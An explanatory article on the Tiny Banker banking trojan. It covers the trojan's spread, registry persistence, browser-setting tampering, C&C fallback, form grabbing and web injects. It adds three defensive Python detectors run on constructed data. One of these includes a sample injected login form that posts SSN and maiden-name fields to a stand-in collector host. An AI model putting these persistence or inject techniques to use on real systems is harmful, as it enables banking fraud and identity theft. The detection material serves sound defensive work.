Tiny Banker, also known as Tinba or Zusy, is an example of a banking trojan. Understanding Tiny Banker helps us understand the tactics, techniques, and procedures of banking trojans in general, as well as how to detect and protect against them. Tiny Banker is an offshoot of the banking trojan line of malware that includes the Zeus trojan, from which the name Zusy arises. First discovered in 2012, Tiny Banker's goal, like that of all banking trojans, is to gather sensitive data from users, including passwords, social security numbers, and banking information.
But Tiny Banker is SMALL: at about 20 KB, it is a fraction of the size of the files it infects, making the malicious code difficult for anti-malware programs to detect. As with most banking trojans, a Tiny Banker infection produces few indicators of compromise. Unless a banking trojan is so poorly written that it degrades performance on the victim PC, the malware may be completely transparent to the user. Tiny Banker even disables security features in the browser to hide its actions.
The Tiny Banker Timeline
A 2012 Tiny Banker outbreak in Turkey hit approximately 60,000 systems. Other attacks were identified in the Czech Republic and the United States. In 2014 the source code for Tiny Banker was released on a malware website, and new iterations of this malware have continued to crop up since then, leading to Tiny Banker being named one of the Top 10 Most Wanted malware in 2016.
How Tiny Banker Infiltrates
Tiny Banker was distributed via infected websites. Phishing emails and advertising content that leads the user to a site hosting malicious code were both used to lure victims to malicious sites. Once run on a vulnerable system, Tiny Banker initially copied itself to the %AppData% folder under the name bin.exe (Symantec, 2012). Different versions of Tiny Banker placed themselves in different folders under %AppData%, with at least one variant creating a folder whose name was randomly generated from known information about the infected system and the Tiny Banker variant. This name, in hex, was also used to encrypt Tiny Banker's memory. Encrypting the malware's memory is one way in which banking trojans like Tiny Banker attempt to avoid detection.
A registry entry is created to ensure bin.exe runs when the system restarts, which makes Tiny Banker persistent on the infected computer. Tiny Banker also modifies installed web browsers such as Firefox and Internet Explorer to disable warning messages and to allow the browser to display HTTP content on HTTPS websites without prompting. These are the very prompts and warnings that might alert the user to the presence of malicious code.
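The two artefacts described above (an autorun entry pointing at an executable dropped loose in %AppData%, and browser settings relaxed so mixed content no longer prompts) are both things a responder can check for offline. The script below is an added example written for this article, not code from the original post or from any vendor tool. It works on constructed data: a dictionary standing in for the values of a user's Run key (as an autoruns export would list them) and a Firefox prefs.js fragment. The two security.* preference names are assumed examples of settings that govern mixed-content warnings and should be confirmed against the Firefox version being audited.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values,
# in the shape an autoruns export would give. The "bin" entry mirrors the
# %AppData%\bin.exe persistence described above; the others are benign look-alikes
# or a variant hiding under a hex-named folder.
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "bin": r"C:\Users\alice\AppData\Roaming\bin.exe",
    "Updater": r'"C:\Program Files\Vendor\updater.exe" --silent',
    "svc": r"C:\Users\alice\AppData\Roaming\3f9a1c7e2b\svc.exe",
}

# Constructed Firefox prefs.js fragment. The two security.* pref names are assumed
# examples of settings that control mixed-content warnings; check them against
# the Firefox version you are auditing before relying on them.
SAMPLE_PREFS_JS = """
user_pref("browser.startup.homepage", "https://example.org");
user_pref("security.warn_viewing_mixed", false);
user_pref("security.mixed_content.block_active_content", false);
"""

MIXED_CONTENT_PREFS = {
    "security.warn_viewing_mixed",
    "security.mixed_content.block_active_content",
}
HEX_NAME_RE = re.compile(r"^[0-9a-f]{8,}$", re.IGNORECASE)
PREF_RE = re.compile(r'user_pref\("([^"]+)",\s*(true|false)\);')


def executable_from_command(command):
    """Extract the executable path from a Run-key command line, quoted or bare."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    match = re.match(r"(.+?\.exe)(?=\s|$)", command, re.IGNORECASE)
    return match.group(1) if match else command.split()[0]


def appdata_depth(path):
    """Number of path components below AppData\\Roaming|Local|LocalLow,
    or None when the path is not inside a user's AppData tree."""
    parts = PureWindowsPath(path).parts
    lowered = [p.lower() for p in parts]
    for i, part in enumerate(lowered[:-1]):
        if part == "appdata" and lowered[i + 1] in ("roaming", "local", "locallow"):
            return len(parts) - (i + 2)
    return None


def triage_run_values(values):
    """Return (value name, executable, reason) for autoruns that look like
    malware dropped loose in the profile rather than an installed product."""
    findings = []
    for name, command in values.items():
        exe = executable_from_command(command)
        depth = appdata_depth(exe)
        if depth is None:
            continue
        parent = PureWindowsPath(exe).parent.name
        if depth == 1:
            findings.append((name, exe, "executable sits directly in the AppData profile root"))
        elif depth == 2 and HEX_NAME_RE.match(parent):
            findings.append((name, exe, f"executable under hex-named folder '{parent}'"))
    return findings


def weakened_firefox_prefs(prefs_js):
    """Return the mixed-content prefs that a prefs.js/user.js text sets to false."""
    return {
        key: False
        for key, value in PREF_RE.findall(prefs_js)
        if key in MIXED_CONTENT_PREFS and value == "false"
    }


if __name__ == "__main__":
    for name, exe, reason in triage_run_values(SAMPLE_RUN_VALUES):
        print(f"[autorun] {name}: {exe} ({reason})")
    for key in weakened_firefox_prefs(SAMPLE_PREFS_JS):
        print(f"[firefox] {key} set to false")
```

The depth heuristic is deliberately narrow: legitimate per-user software (the OneDrive entry) lives several folders deep under a vendor name, whereas an executable sitting in the profile root, or one level down inside a hex-named folder, matches the drop locations described above without flagging every AppData autorun. On a live system the same two functions can be fed the output of a registry export and the user's prefs.js.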
Tiny Banker injects malicious code into a variety of processes to maintain persistence and an active infection. It targets the Windows processes explorer.exe and svchost.exe, as well as the browser processes iexplore.exe, chrome.exe, and firefox.exe. Tiny Banker also targets any other running process, regardless of its original purpose, so that the malware becomes fully embedded in the victim PC.
Tiny Banker uses encryption when it communicates with its command and control (C&C) servers. Each instance of Tiny Banker is hardcoded with four C&C domains, so if one is unavailable the malware can immediately attempt to connect to the next. If Tiny Banker cannot connect to any C&C server, it falls back to the default config files included in the Tiny Banker download. Tiny Banker's config file contains the domains from which the malware will attempt to collect credentials for use in its personally identifying information (PII) collection scheme. Some domains, such as Facebook, Google, and Microsoft, are hardcoded, and others are downloaded from the C&C server based on the location of the infected computer. Sites targeted by Tiny Banker include government portals and banking and financial institutions.
Tiny Banker steals data in two ways. In man-in-the-browser attacks, it uses form grabbing to intercept keystrokes before they can be encrypted for HTTPS websites. In a web inject, the malware modifies the web browser to serve fake pages, or fake sections of pages, in response to legitimate requests from users. Tiny Banker gathers information on the layout, graphics, and design of targeted websites and then presents a pop-up designed to look like the legitimate site. The pop-up informs the user that the intended website is under construction and requests that they enter sensitive data to verify their identity. Users are asked for financial information as well as identifying information such as social security numbers. Mother's maiden name, a common security challenge question, is also often requested. Data stolen by Tiny Banker is sent back to the C&C server.
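The fallback behaviour described above (a fixed list of C&C names tried one after another until one answers) leaves a recognisable trace in resolver logs: one host failing lookups for several distinct names within seconds, often followed by a successful lookup. The detector below is an added example written for this article, not code from the original post or from any product; it runs over a constructed resolver log whose domain names use the reserved .invalid TLD and whose host names and timestamps are made up. The log line format and the 30-second window are assumptions; adapt the regular expression to your resolver's format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed resolver log (not real telemetry). Domains use the reserved
# .invalid TLD so they cannot resolve anywhere. WS-017 shows the pattern
# described above: several hardcoded C&C names fail in quick succession
# before one finally answers. WS-042 shows ordinary traffic plus one typo.
SAMPLE_DNS_LOG = """\
2016-03-01T10:00:01 host=WS-042 query=update.vendor-a.invalid rcode=NOERROR
2016-03-01T10:00:05 host=WS-042 query=cdn.vendor-b.invalid rcode=NOERROR
2016-03-01T10:05:00 host=WS-017 query=alpha-sink.invalid rcode=NXDOMAIN
2016-03-01T10:05:01 host=WS-017 query=beta-sink.invalid rcode=NXDOMAIN
2016-03-01T10:05:02 host=WS-017 query=gamma-sink.invalid rcode=SERVFAIL
2016-03-01T10:05:03 host=WS-017 query=delta-sink.invalid rcode=NOERROR
2016-03-01T10:20:00 host=WS-042 query=typo-site.invalid rcode=NXDOMAIN
"""

LINE_RE = re.compile(r"^(\S+) host=(\S+) query=(\S+) rcode=(\S+)$")
FAILURE_CODES = {"NXDOMAIN", "SERVFAIL", "REFUSED"}


def parse_dns_log(text):
    """Parse 'timestamp host=... query=... rcode=...' lines into event dicts."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        ts, host, query, rcode = match.groups()
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "query": query, "rcode": rcode})
    return events


def detect_fallback_chains(log_text, window=timedelta(seconds=30), min_failures=3):
    """Flag hosts whose lookups fail for >= min_failures distinct names inside
    one window, and record which name (if any) then resolved for them."""
    events = sorted(parse_dns_log(log_text), key=lambda e: (e["host"], e["ts"]))
    alerts = []
    recent = defaultdict(list)   # host -> failed events still inside the window
    open_alert = {}              # host -> alert waiting to see what resolves next
    for event in events:
        host = event["host"]
        recent[host] = [f for f in recent[host] if event["ts"] - f["ts"] <= window]
        if not recent[host]:
            open_alert.pop(host, None)      # chain went quiet; start fresh
        if event["rcode"] not in FAILURE_CODES:
            alert = open_alert.pop(host, None)
            if alert is not None:           # first success after the failures
                alert["resolved_to"] = event["query"]
            continue
        recent[host].append(event)
        domains = sorted({f["query"] for f in recent[host]})
        if host in open_alert:
            open_alert[host]["failed_domains"] = domains
        elif len(domains) >= min_failures:
            alert = {"host": host, "first_seen": recent[host][0]["ts"],
                     "failed_domains": domains, "resolved_to": None}
            alerts.append(alert)
            open_alert[host] = alert
    return alerts


if __name__ == "__main__":
    for alert in detect_fallback_chains(SAMPLE_DNS_LOG):
        print(f"{alert['host']} at {alert['first_seen']}: failed "
              f"{', '.join(alert['failed_domains'])}; then resolved "
              f"{alert['resolved_to'] or 'nothing'}")
```

The rule keys on the shape of the traffic rather than on any particular domain, so it still fires after the operators rotate their names; the resolved_to field is what an analyst pivots on to find the live C&C address. Expect noise from hosts with broken search domains or misconfigured proxies, and tune the window and threshold against a baseline of your own resolver logs.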
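Because a web inject alters the page the browser renders rather than the page the server sent, the server cannot see it directly; what a site operator can do is compare the form the user actually submits (or a client-side integrity script reports) against the form the genuine page is known to contain. The auditor below is an added example written for this article, not code from the original post or from any bank's integrity tooling. Both HTML pages are constructed: a genuine login form, and the same form as an inject like the one described above would render it, with identity-verification fields added and the form action redirected. The expected field set, the expected host bank.example, and the list of sensitive name fragments are assumptions for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed baseline for the constructed login page: the fields the genuine form
# is known to contain and the host the form should post to.
EXPECTED_FIELDS = {"username", "password", "csrf_token"}
EXPECTED_FORM_HOST = "bank.example"
# Name fragments that signal a "verification" prompt asking for PII a login
# form has no business collecting.
SENSITIVE_HINTS = ("ssn", "social", "maiden", "pin", "card", "cvv", "birth", "dob")

# Constructed pages: the genuine login form, and the same page as a web inject
# would render it, with extra PII fields and the action pointed off-site.
CLEAN_PAGE = """
<html><body><form action="https://bank.example/login" method="post">
<input type="hidden" name="csrf_token" value="abc">
<input type="text" name="username"><input type="password" name="password">
<button type="submit">Sign in</button></form></body></html>
"""
INJECTED_PAGE = """
<html><body><form action="https://collector.invalid/verify" method="post">
<input type="hidden" name="csrf_token" value="abc">
<input type="text" name="username"><input type="password" name="password">
<p>Site under construction: verify your identity to continue.</p>
<input type="text" name="ssn"><input type="text" name="mothers_maiden_name">
<button type="submit">Verify</button></form></body></html>
"""


class FormCollector(HTMLParser):
    """Collect every form's action and the names of its input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "fields": [names]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = attrs.get("name")
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(page, expected_fields=EXPECTED_FIELDS,
                     expected_host=EXPECTED_FORM_HOST):
    """Compare the first form on the page with the known-good baseline and
    report unexpected fields, missing fields, PII-looking additions and
    whether the form now posts somewhere other than the expected host."""
    collector = FormCollector()
    collector.feed(page)
    if not collector.forms:
        return {"error": "no form found"}
    form = collector.forms[0]
    names = set(form["fields"])
    unexpected = sorted(names - expected_fields)
    action_host = urlparse(form["action"]).hostname
    return {
        "unexpected_fields": unexpected,
        "missing_fields": sorted(expected_fields - names),
        "sensitive_fields": [n for n in unexpected
                             if any(h in n.lower() for h in SENSITIVE_HINTS)],
        "action_host": action_host,
        "action_offsite": action_host != expected_host,
    }


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, audit_login_page(page))
```

The field allowlist catches the extra inputs regardless of how convincingly the inject copies the site's layout and graphics, which is the part the malware invests in; the off-site action check catches injects that post the harvested data somewhere other than the bank. Run server-side, the same comparison applies to the field names present in a submitted POST body, which a browser-side inject cannot hide.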
During static analysis of the Tiny Banker source code, several interesting clues stood out. In the FormGrab Windows executable file, the executables for each of the major Windows web browsers are listed.
- Internet Explorer
This indicates that Tiny Banker will attempt to compromise each of these browsers with web injects. In fact, another ASM (assembler language source) file lists the full path to the default installation location of each of these browser executables. The code that modifies the security settings to allow Firefox to display unsecured content on secured sites can also be seen in these files.
Within the source folder there is a folder called -Rootkit. Because its name begins with a dash, it can only be opened by giving the analysis computer the folder's relative path rather than the bare folder name. This folder contains the functions for hiding processes, files, and registry entries on a Windows machine; these functions are clearly used to help Tiny Banker remain hidden.
Finally, although much of Tiny Banker's source code is annotated in English, some of it is not. Google Translate identifies some of the comments and function names as Russian, which makes sense, as Tiny Banker is thought to be a Russian product.
Since Tiny Banker injects malicious code into legitimate processes, cleaning it can be difficult. Most major anti-malware vendors and products, such as Malwarebytes, Symantec, and Windows Defender, offer Tiny Banker removal tools. Full system state backups can also be used to restore the system to a time before the infection. This route carries risks, however: a Tiny Banker infection may not be immediately apparent, so selecting a restore point can be challenging, and any work or changes made since the restore point will be lost.
Tiny Banker, like all banking trojans, produces few indicators of compromise, and its small size increases its ability to evade detection. Banking trojans can steal more than just money: they target personally identifying information and personal facts, and that data can be used to break into other accounts, even at institutions that were not compromised, and to facilitate identity theft and credit card fraud. Having a reliable anti-malware program that performs active scanning, and keeping it up to date, is vital to preventing infections from trojans like Tiny Banker.